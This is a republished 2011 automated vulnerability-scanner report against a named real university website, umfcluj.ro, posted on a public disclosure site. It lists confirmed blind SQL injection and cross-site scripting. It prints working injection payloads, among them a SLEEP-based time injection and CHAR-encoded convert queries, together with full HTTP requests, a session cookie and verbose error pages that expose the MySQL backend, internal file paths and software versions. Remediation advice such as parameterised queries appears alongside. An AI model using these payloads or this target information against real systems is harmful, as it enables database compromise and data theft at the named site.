Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting in umfcluj.ro, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://umfcluj.ro/en
SCAN DATE
 7/19/2011 12:14:41 PM
REPORT DATE
 7/19/2011 5:51:57 PM
SCAN DURATION
 04:08:46

Total Requests

Average Speed

req/sec.
35
identified
10
confirmed
14
critical
10
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
40 %
IMPORTANT
9 %
MEDIUM
3 %
LOW
20 %
INFORMATION
29 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/Autentificare.aspx Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
[Possible] Internal Path Leakage (Windows) No
/css/ Forbidden Resource Yes
/default.aspx [Possible] Internal Path Leakage (Windows) No
/detaliu.aspx t GET Blind SQL Injection Yes
t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
MySQL Database Identified Yes
/Detaliu.aspx t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
[Possible] Internal Path Leakage (Windows) No
/en MAC is not Enabled in ViewState No
Cookie Not Marked As HttpOnly Yes
ASP.NET Version Disclosure No
ViewState is not Encrypted No
/js/jquery.hoverIntent.js E-mail Address Disclosure No
/lista.aspx t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
t GET [Probable] SQL Injection No
t GET Cross-site Scripting Yes
t GET Cross-site Scripting Yes
t GET Database Error Message No
[Possible] Internal Path Leakage (Windows) No
/newsletter.aspx Internal Server Error Yes
ASP.NET Stack Trace Disclosure No
[Possible] Internal Path Leakage (Windows) No
/rezultateleCautarii.aspx n GET [Probable] SQL Injection No
n GET [Probable] SQL Injection No
n GET [Probable] SQL Injection No
n GET [Probable] SQL Injection No
/robots.txt IIS Version Disclosure No
Robots.txt Identified Yes
Blind SQL Injection

Blind SQL Injection
1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /detaliu.aspx

/detaliu.aspx CONFIRMED

http://umfcluj.ro/detaliu.aspx?t=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&eID=451

Parameters

Parameter Type Value
t GET -111' OR SLEEP(25)=0 LIMIT 1--
eID GET 451

Request

GET /detaliu.aspx?t=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&eID=451 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:27:48 GMT
Content-Length: 80063



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta name="description" content="" />
<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationro-RO.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<link type="text/css" rel="stylesheet" href="/css/lightbox.css" />
<script type="text/javascript" src="/js/jquery.lightbox.js"></script>
<title>

</title></head>
<body class="ro-RO" >
<form name="aspnetForm" method="post" action="detaliu.aspx?t=-111'+OR+SLEEP(25)%3d0+LIMIT+1--+&amp;eID=451" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODE0NzU5NDcxZGQ=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAK1xMK9BQLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="ro-RO" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB " href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO active" href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Cauta in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class=""><a class="" href="/">Prima pagină</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Adrese-in-Universitate">Adrese</a> <ul> </ul> </li> <li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Harta digitala</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Harta site</a> <ul> </ul> </li> <li class=""><a class="" href="/contact.aspx">Contact</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Inregistrare</a></li>
<li><a href="/Autentificare.aspx">Intrare cont</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Finalizare Comanda</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">Afisare cos</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Cost total</span>
<strong></strong>
</div>
<div id="noProducts">Nu aveti produse in cos</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">Nu aveti produse in cos</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" alt="" width="588" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class=""><a class="" href="#">Informatii pentru</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In sectiunea </span>Admitere<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">Prezentarea Universitatii</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Simulare-Examen-2011" onclick="document.location.href='/Detaliu.aspx?t=Simulare-Examen-2011'">Simulare examen 2011</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Admitere 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In sectiunea </span>Studenti actuali<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Oferta educationala</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Informatii pentru studenti</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Organizatii studentesti</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In sectiunea </span>Masterat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Masterat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Masterat-Date-de-contact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Masterat-Informatii-pentru-masteranzi" onclick="document.location.href='/Detaliu.aspx?t=Masterat-Informatii-pentru-masteranzi'">Informatii pentru masteranzi</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In sectiunea </span>Rezidentiat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Rezidentiat-informatii" onclick="document.location.href='/Detaliu.aspx?t=Rezidentiat-informatii'">Informatii rezidentiat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In sectiunea </span>Doctorat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Prezentare</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Organizarea Scolii Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Functionarea Scolii Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Birou Consiliere Cariera</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Rezumate-Teze-de-Doctorat" onclick="document.location.href='/lista.aspx?t=Doctorat-Rezumate-Teze-de-Doctorat'">Rezumate teze de doctorat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In sectiunea </span>Studii postuniversitare<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare" onclick="document.locat..
[Probable] SQL Injection

[Probable] SQL Injection
13 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /Detaliu.aspx

/Detaliu.aspx

http://umfcluj.ro/Detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /Detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:17:29 GMT
Content-Length: 6411


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /lista.aspx

/lista.aspx

http://umfcluj.ro/lista.aspx?t='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(..

Parameters

Parameter Type Value
t GET '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Request

GET /lista.aspx?t='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:19:51 GMT
Content-Length: 6981


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
